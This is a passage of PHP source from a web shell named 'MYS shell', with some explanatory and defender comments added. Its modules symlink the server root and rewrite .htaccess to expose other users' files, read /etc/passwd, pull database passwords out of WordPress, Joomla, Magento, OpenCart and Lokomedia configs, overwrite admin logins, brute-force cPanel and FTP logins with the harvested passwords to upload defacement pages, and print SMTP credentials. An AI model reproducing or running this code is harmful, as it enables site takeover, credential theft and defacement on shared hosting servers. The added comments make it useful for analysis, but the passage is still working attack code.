  1105. @chdir("Rlx_Symlink");
  1106. exe("ln -s / root");
  1107. $file3 = 'Options Indexes FollowSymLinks
  1108. DirectoryIndex 0xaN0n.htm
  1109. AddType text/plain .php
  1110. AddHandler text/plain .php
  1111. Satisfy Any';
  1112.  $fp3 = fopen('.htaccess','w');
  1113.  $fw3 = fwrite($fp3,$file3);
  1114.  @fclose($fp3);
  1115.  echo "
  1116. <table align=center border=1><tr>
  1117. <td align=center><font size=3>S. No.</font></td>
  1118. <td align=center><font size=3>Users</font></td>
  1119. <td align=center><font size=3>Symlink</font></td></tr>";
  1120.  $dcount = 1;
  1121.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1122.  while(!feof($file)){
  1123.  $s = fgets($file);
  1124.  $matches = array();
  1125.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1126.  $matches = str_replace("home/","",$matches[1]);
  1127.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1128.  continue;
  1129.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1130. <td align=center><font class=txt>" . $matches . "</td>";
  1131.  echo "<td align=center><font class=txt><a href=$full/Rlx_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1132.  $dcount++;}fclose($file);
  1133.  echo "</table>";}else{if($os != "Windows"){@mkdir("Rlx_Symlink",0777);@chdir("Rlx_Symlink");@exe("ln -s / root");$file3 = '
  1134. Options Indexes FollowSymLinks
  1135. DirectoryIndex 0xaN0n.htm
  1136. AddType text/plain .php
  1137. AddHandler text/plain .php
  1138. Satisfy Any
  1139. ';
  1140.  $fp3 = fopen('.htaccess','w');
  1141.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1142.  echo "
  1143. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1144. <table align=center border=1><tr>
  1145. <td align=center><font size=3>ID</font></td>
  1146. <td align=center><font size=3>Users</font></td>
  1147. <td align=center><font size=3>Symlink</font></td></tr>";
  1148.  $temp = "";$val1 = 0;$val2 = 1000;
  1149.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1150.  if ($uid)$temp .= join(':',$uid)."\n";}
  1151.  echo '<br/>';$temp = trim($temp);$file5 =
  1152.  fopen("test.txt","w");
  1153.  fputs($file5,$temp);
  1154.  fclose($file5);$dcount = 1;$file =
  1155.  fopen("test.txt", "r") or exit("Unable to open file!");
  1156.  while(!feof($file)){$s = fgets($file);$matches = array();
  1157.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1158.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1159.  continue;
  1160.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1161. <td align=center><font class=txt>" . $matches . "</td>";
  1162.  echo "<td align=center><font class=txt><a href=$full/Rlx_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1163.  $dcount++;}
  1164.  fclose($file);
  1165.  echo "</table></div></center>";unlink("test.txt");
  1166.  } else
  1167.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1168.  }
  1169.  }    
  1170. } elseif($_GET['do'] == 'auto_edit_user') {
  1171.     if($_POST['hajar']) {
  1172.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1173.             echo "username atau password harus lebih dari 6 karakter";
  1174.         } else {
  1175.             $user_baru = $_POST['user_baru'];
  1176.             $pass_baru = md5($_POST['pass_baru']);
  1177.             $conf = $_POST['config_dir'];
  1178.             $scan_conf = scandir($conf);
  1179.             foreach($scan_conf as $file_conf) {
  1180.                 if(!is_file("$conf/$file_conf")) continue;
  1181.                 $config = file_get_contents("$conf/$file_conf");
  1182.                 if(preg_match("/JConfig|joomla/",$config)) {
  1183.                     $dbhost = ambilkata($config,"host = '","'");
  1184.                     $dbuser = ambilkata($config,"user = '","'");
  1185.                     $dbpass = ambilkata($config,"password = '","'");
  1186.                     $dbname = ambilkata($config,"db = '","'");
  1187.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1188.                     $prefix = $dbprefix."users";
  1189.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1190.                     $db = mysql_select_db($dbname);
  1191.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1192.                     $result = mysql_fetch_array($q);
  1193.                     $id = $result['id'];
  1194.                     $site = ambilkata($config,"sitename = '","'");
  1195.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1196.                     echo "Config => ".$file_conf."<br>";
  1197.                     echo "CMS => Joomla Kuy<br>";
  1198.                     if($site == '') {
  1199.                         echo "Sitename => <font color=red>error, cant take the domain name</font><br>";
  1200.                     } else {
  1201.                         echo "Sitename => $site<br>";
  1202.                     }
  1203.                     if(!$update OR !$conn OR !$db) {
  1204.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1205.                     } else {
  1206.                         echo "Status => <font color=green>success edit user, please log in with the user &new pass.</font><br><br>";
  1207.                     }
  1208.                     mysql_close($conn);
  1209.                 } elseif(preg_match("/WordPress/",$config)) {
  1210.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1211.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1212.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1213.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1214.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1215.                     $prefix = $dbprefix."users";
  1216.                     $option = $dbprefix."options";
  1217.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1218.                     $db = mysql_select_db($dbname);
  1219.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1220.                     $result = mysql_fetch_array($q);
  1221.                     $id = $result[ID];
  1222.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1223.                     $result2 = mysql_fetch_array($q2);
  1224.                     $target = $result2[option_value];
  1225.                     if($target == '') {
  1226.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
  1227.                     } else {
  1228.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1229.                     }
  1230.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1231.                     echo "Config => ".$file_conf."<br>";
  1232.                     echo "CMS => Wordpress Kuy<br>";
  1233.                     echo $url_target;
  1234.                     if(!$update OR !$conn OR !$db) {
  1235.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1236.                     } else {
  1237.                         echo "Status => <font color=green>success edit user, please log in with the user & new pass.</font><br><br>";
  1238.                     }
  1239.                     mysql_close($conn);
  1240.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1241.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1242.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1243.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1244.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1245.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1246.                     $prefix = $dbprefix."admin_user";
  1247.                     $option = $dbprefix."core_config_data";
  1248.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1249.                     $db = mysql_select_db($dbname);
  1250.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1251.                     $result = mysql_fetch_array($q);
  1252.                     $id = $result[user_id];
  1253.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1254.                     $result2 = mysql_fetch_array($q2);
  1255.                     $target = $result2[value];
  1256.                     if($target == '') {
  1257.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
  1258.                     } else {
  1259.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1260.                     }
  1261.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1262.                     echo "Config => ".$file_conf."<br>";
  1263.                     echo "CMS => Magento Kuy<br>";
  1264.                     echo $url_target;
  1265.                     if(!$update OR !$conn OR !$db) {
  1266.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1267.                     } else {
  1268.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
  1269.                     }
  1270.                     mysql_close($conn);
  1271.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1272.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1273.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1274.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1275.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1276.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1277.                     $prefix = $dbprefix."user";
  1278.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1279.                     $db = mysql_select_db($dbname);
  1280.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1281.                     $result = mysql_fetch_array($q);
  1282.                     $id = $result[user_id];
  1283.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1284.                     if($target == '') {
  1285.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
  1286.                     } else {
  1287.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1288.                     }
  1289.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1290.                     echo "Config => ".$file_conf."<br>";
  1291.                     echo "CMS => OpenCart Kuy<br>";
  1292.                     echo $url_target;
  1293.                     if(!$update OR !$conn OR !$db) {
  1294.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1295.                     } else {
  1296.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
  1297.                     }
  1298.                     mysql_close($conn);
  1299.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1300.                     $dbhost = ambilkata($config,'server = "','"');
  1301.                     $dbuser = ambilkata($config,'username = "','"');
  1302.                     $dbpass = ambilkata($config,'password = "','"');
  1303.                     $dbname = ambilkata($config,'database = "','"');
  1304.                     $prefix = "users";
  1305.                     $option = "identitas";
  1306.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1307.                     $db = mysql_select_db($dbname);
  1308.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1309.                     $result = mysql_fetch_array($q);
  1310.                     $target = $result[alamat_website];
  1311.                     if($target == '') {
  1312.                         $target2 = $result[url];
  1313.                         $url_target = "Login => <font color=red>error, cant take the domain name</font><br>";
  1314.                         if($target2 == '') {
  1315.                             $url_target2 = "Login => <font color=red>error, cant take the domain name</font><br>";
  1316.                         } else {
  1317.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1318.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1319.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1320.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1321.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1322.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1323.                             } else {
  1324.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>or where is the login admin :p</font> ]<br>";
  1325.                             }
  1326.                         }
  1327.                     } else {
  1328.                         $cek_login = file_get_contents("$target/adminweb/");
  1329.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1330.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1331.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1332.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1333.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1334.                         } else {
  1335.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1336.                         }
  1337.                     }
  1338.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1339.                     echo "Config => ".$file_conf."<br>";
  1340.                     echo "CMS => Lokomedia Njai<br>";
  1341.                     if(preg_match('/error, cant take the domain name/', $url_target)) {
  1342.                         echo $url_target2;
  1343.                     } else {
  1344.                         echo $url_target;
  1345.                     }
  1346.                     if(!$update OR !$conn OR !$db) {
  1347.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1348.                     } else {
  1349.                         echo "Status => <font color=white>succses edit user, please log in with the user & new pass.</font><br><br>";
  1350.                     }
  1351.                     mysql_close($conn);
  1352.                 }
  1353.             }
  1354.         }
  1355.     } else {
  1356.         echo "<center>
  1357.         <h1>Auto Edit User Config</h1>
  1358.         <form method='post'>
  1359.         DIR Config: <br>
  1360.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1361.         Set User & Pass: <br>
  1362.         <input type='text' name='user_baru' value='mysteam' placeholder='user_baru'><br>
  1363.         <input type='text' name='pass_baru' value='MYSteam2018' placeholder='pass_baru'><br>
  1364.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1365.         </form>
  1366.         <span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1367.         ";
  1368.     }
  1369. } elseif($_GET['do'] == 'cpanel') {
  1370.     if($_POST['crack']) {
  1371.         $usercp = explode("\r\n", $_POST['user_cp']);
  1372.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1373.         $i = 0;
  1374.         foreach($usercp as $ucp) {
  1375.             foreach($passcp as $pcp) {
  1376.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1377.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1378.                     } else {
  1379.                         $_SESSION[$ucp] = "1";
  1380.                         $_SESSION[$pcp] = "1";
  1381.                         if($ucp == '' || $pcp == '') {
  1382.                            
  1383.                         } else {
  1384.                             $i++;
  1385.                             if(function_exists('posix_getpwuid')) {
  1386.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  1387.                                 if($domain_cp == '') {
  1388.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1389.                                 } else {
  1390.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1391.                                     foreach($domains_cp[1] as $dj) {
  1392.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1393.                                         $user_cp_url = $user_cp_url['name'];
  1394.                                         if($user_cp_url == $ucp) {
  1395.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
  1396.                                             break;
  1397.                                         }
  1398.                                     }
  1399.                                 }
  1400.                             } else {
  1401.                                 $dom = "<font color=red>function is Disable by system</font>";
  1402.                             }
  1403.                             echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
  1404.                         }
  1405.                     }
  1406.                 }
  1407.             }
  1408.         }
  1409.         if($i == 0) {
  1410.         } else {
  1411.             echo "<br>successful ".$i." Cpanel by <font color=red>MYS shell.</font>";
  1412.         }
  1413.     } else {
  1414.         echo "<center>
  1415.         <form method='post'>
  1416.         USER: <br>
  1417.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1418.         $_usercp = fopen("/etc/passwd","r");
  1419.         while($getu = fgets($_usercp)) {
  1420.             if($getu == '' || !$_usercp) {
  1421.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1422.             } else {
  1423.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1424.                 foreach($u[1] as $user_cp) {
  1425.                         if(is_dir("/home/$user_cp/public_html")) {
  1426.                             echo "$user_cp\n";
  1427.                     }
  1428.                 }
  1429.             }
  1430.         }
  1431.         echo "</textarea><br>
  1432.         PASS: <br>
  1433.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1434.         function cp_pass($dir) {
                    // Credential-harvesting helper of the 'cpanel' module. Reads every regular
                    // file directly inside $dir (no recursion) and, when the content carries one
                    // of the CMS markers below, appends the database password found in it to
                    // $pass, one value per line.
                    // The list is echoed, not returned: the call site runs while the
                    // <textarea name='pass_cp'> is open, so the values pre-fill that field and
                    // the following `echo $cp_pass` prints nothing (the function returns null).
                    // ambilkata() is defined outside this view; from its call sites it appears
                    // to return the text between two delimiters -- confirm against its definition.
                    // Defender note: the POST handler of this module tries the submitted pass_cp
                    // values against local accounts with mysql_connect(), so the routine depends
                    // on database passwords being reused for other accounts and on config files
                    // being readable by the compromised site's PHP user. Unique credentials per
                    // service and per-account file isolation limit what it can collect.
  1435.             $pass = "";
  1436.             $dira = scandir($dir);
  1437.             foreach($dira as $dirb) {
  1438.                 if(!is_file("$dir/$dirb")) continue;
  1439.                 $ambil = file_get_contents("$dir/$dirb");
                        // WordPress-style config: value of the DB_PASSWORD define.
  1440.                 if(preg_match("/WordPress/", $ambil)) {
  1441.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
                        // Joomla-style config (JConfig class): the single-quoted password property.
  1442.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1443.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
                        // Magento-style XML config: CDATA content of the <password> element.
  1444.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1445.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
                        // Indonesian marker string; the config-edit module of this shell labels
                        // files carrying it as Lokomedia.
  1446.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1447.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
                        // Same markers the config-edit module labels as OpenCart.
  1448.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1449.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
                        // NOTE(review): "[client]" is parsed as a character class anchored to the
                        // whole subject, so this branch only fires for a file whose entire content
                        // is one of those letters; it is effectively dead in this variant.
  1450.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  1451.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  1452.                     if(preg_match('/"/', $pass1[1])) {
  1453.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1454.                         $pass .= $pass1[1]."\n";
  1455.                     } else {
  1456.                         $pass .= $pass1[1]."\n";
  1457.                     }
                        // Files containing cc_encryption_hash (the field name used by the shell's
                        // "WHMCS Decoder" form): value of db_password.
  1458.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1459.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1460.                 }
  1461.             }
  1462.             echo $pass;
  1463.         }
  1464.         $cp_pass = cp_pass($dir);
  1465.         echo $cp_pass;
  1466.         echo "</textarea><br>
  1467.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1468.         </form>
  1469.         <span>Note: CPanel Crack auto get password ( pake db password ) it will work if it runs inside the folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1470.     }
  1471. } elseif($_GET['do'] == 'cpftp_auto') {
  1472.     if($_POST['crack']) {
  1473.         $usercp = explode("\r\n", $_POST['user_cp']);
  1474.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1475.         $i = 0;
  1476.         foreach($usercp as $ucp) {
  1477.             foreach($passcp as $pcp) {
  1478.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1479.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1480.                     } else {
  1481.                         $_SESSION[$ucp] = "1";
  1482.                         $_SESSION[$pcp] = "1";
  1483.                         if($ucp == '' || $pcp == '') {
  1484.                             //
  1485.                         } else {
  1486.                             echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1487.                             $ftp_conn = ftp_connect($ip);
  1488.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1489.                             if((!$ftp_login) || (!$ftp_conn)) {
  1490.                                 echo "[+] <font color=red>Login Failed</font><br><br>";
  1491.                             } else {
  1492.                                 echo "[+] <font color=white>Login Succses</font><br>";
  1493.                                 $fi = htmlspecialchars($_POST['file_deface']);
  1494.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1495.                                 if($deface) {
  1496.                                     $i++;
  1497.                                     echo "[+] <font color=white>Deface Succses</font><br>";
  1498.                                     if(function_exists('posix_getpwuid')) {
  1499.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  1500.                                         if($domain_cp == '') {
  1501.                                             echo "[+] <font color=red>cant take the domain name</font><br><br>";
  1502.                                         } else {
  1503.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1504.                                             foreach($domains_cp[1] as $dj) {
  1505.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1506.                                                 $user_cp_url = $user_cp_url['name'];
  1507.                                                 if($user_cp_url == $ucp) {
  1508.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1509.                                                     break;
  1510.                                                 }
  1511.                                             }
  1512.                                         }
  1513.                                     } else {
  1514.                                         echo "[+] <font color=red>cant take the domain name</font><br><br>";
  1515.                                     }
  1516.                                 } else {
  1517.                                     echo "[-] <font color=red>Deface Failed</font><br><br>";
  1518.                                 }
  1519.                             }
  1520.                             //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1521.                         }
  1522.                     }
  1523.                 }
  1524.             }
  1525.         }
  1526.         if($i == 0) {
  1527.         } else {
  1528.             echo "<br>success deface ".$i." Cpanel by <font color=white>MYS shell</font>";
  1529.         }
  1530.     } else {
  1531.         echo "<center>
  1532.         <form method='post'>
  1533.         Filename: <br>
  1534.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1535.         Deface Page: <br>
  1536.         <input type='text' name='deface' placeholder='http://www.the-web-is-deface.com/file.php' style='width: 450px;'><br>
  1537.         USER: <br>
  1538.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1539.         $_usercp = fopen("/etc/passwd","r");
  1540.         while($getu = fgets($_usercp)) {
  1541.             if($getu == '' || !$_usercp) {
  1542.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1543.             } else {
  1544.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1545.                 foreach($u[1] as $user_cp) {
  1546.                         if(is_dir("/home/$user_cp/public_html")) {
  1547.                             echo "$user_cp\n";
  1548.                     }
  1549.                 }
  1550.             }
  1551.         }
  1552.         echo "</textarea><br>
  1553.         PASS: <br>
  1554.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1555.         function cp_pass($dir) {
                    // Credential-harvesting helper of the 'cpftp_auto' module; a near copy of
                    // the function of the same name in the 'cpanel' branch (only one of the two
                    // conditional declarations runs per request). Reads every regular file
                    // directly inside $dir and appends the database password of each recognised
                    // CMS config to $pass, one per line.
                    // The result is echoed into the open <textarea name='pass_cp'>; nothing is
                    // returned, so the later `echo $cp_pass` prints nothing.
                    // ambilkata() is defined outside this view; it appears to return the text
                    // between two delimiters -- confirm against its definition.
                    // Defender note: the values collected here feed the module's POST handler,
                    // which tests them with mysql_connect() and then ftp_login(). Password reuse
                    // between database, hosting and FTP accounts is what the module relies on.
  1556.             $pass = "";
  1557.             $dira = scandir($dir);
  1558.             foreach($dira as $dirb) {
  1559.                 if(!is_file("$dir/$dirb")) continue;
  1560.                 $ambil = file_get_contents("$dir/$dirb");
                        // WordPress-style config: value of the DB_PASSWORD define.
  1561.                 if(preg_match("/WordPress/", $ambil)) {
  1562.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
                        // Joomla-style config (JConfig class).
  1563.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1564.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
                        // Magento-style XML config.
  1565.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1566.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
                        // Marker string the config-edit module labels as Lokomedia.
  1567.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1568.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
                        // Markers the config-edit module labels as OpenCart.
  1569.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1570.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
                        // Any file containing the word "client": takes the rest of the first
                        // "password=" line and keeps it only when it contains a double quote
                        // (quotes stripped). Unquoted values are dropped by this variant.
  1571.                 } elseif(preg_match("/client/", $ambil)) {
  1572.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1573.                     if(preg_match('/"/', $pass1[1])) {
  1574.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1575.                         $pass .= $pass1[1]."\n";
  1576.                     }
                        // Files containing cc_encryption_hash: value of db_password.
  1577.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1578.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1579.                 }
  1580.             }
  1581.             echo $pass;
  1582.         }
  1583.         $cp_pass = cp_pass($dir);
  1584.         echo $cp_pass;
  1585.         echo "</textarea><br>
  1586.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1587.         </form>
  1588.         <span>NB: CPanel Crack auto get password ( pake db password ) Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1589.     }
  1590. } elseif($_GET['do'] == 'smtp') {
  1591.     echo "<center><span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1592.     function scj($dir) {
                // Mail-credential harvester of the 'smtp' module. Reads every regular file
                // directly inside $dir, strips all "$" characters from the content so that
                // property names can be matched without the PHP sigil, and for files that
                // look like a Joomla configuration (JConfig / joomla) prints the SMTP host,
                // port, user, password, auth flag and transport security setting as HTML.
                // Nothing is returned; the caller's `echo $smpt_hunter` prints nothing.
                // ambilkata() is defined outside this view; it appears to return the text
                // between two delimiters -- confirm against its definition.
                // Defender note: SMTP credentials stored in a CMS config readable by the
                // compromised account should be treated as disclosed and rotated; outbound
                // mail volume on the affected relay account is a useful follow-up signal.
  1593.         $dira = scandir($dir);
  1594.         foreach($dira as $dirb) {
  1595.             if(!is_file("$dir/$dirb")) continue;
  1596.             $ambil = file_get_contents("$dir/$dirb");
  1597.             $ambil = str_replace("$", "", $ambil);
  1598.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1599.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1600.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1601.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1602.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1603.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1604.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
                    // Values are written into the page unescaped, exactly as found in the file.
  1605.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  1606.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
  1607.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
  1608.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  1609.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  1610.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
  1611.             }
  1612.         }
  1613.     }
  1614.     $smpt_hunter = scj($dir);
  1615.     echo $smpt_hunter;
  1616. } elseif($_GET['do'] == 'auto_wp') {
  1617.     if($_POST['hajar']) {
  1618.         $title = htmlspecialchars($_POST['new_title']);
  1619.         $pn_title = str_replace(" ", "-", $title);
  1620.         if($_POST['cek_edit'] == "Y") {
  1621.             $script = $_POST['edit_content'];
  1622.         } else {
  1623.             $script = $title;
  1624.         }
  1625.         $conf = $_POST['config_dir'];
  1626.         $scan_conf = scandir($conf);
  1627.         foreach($scan_conf as $file_conf) {
  1628.             if(!is_file("$conf/$file_conf")) continue;
  1629.             $config = file_get_contents("$conf/$file_conf");
  1630.             if(preg_match("/WordPress/", $config)) {
  1631.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1632.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1633.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1634.                 $dbname = ambilkata($config,"DB_NAME', '","'");
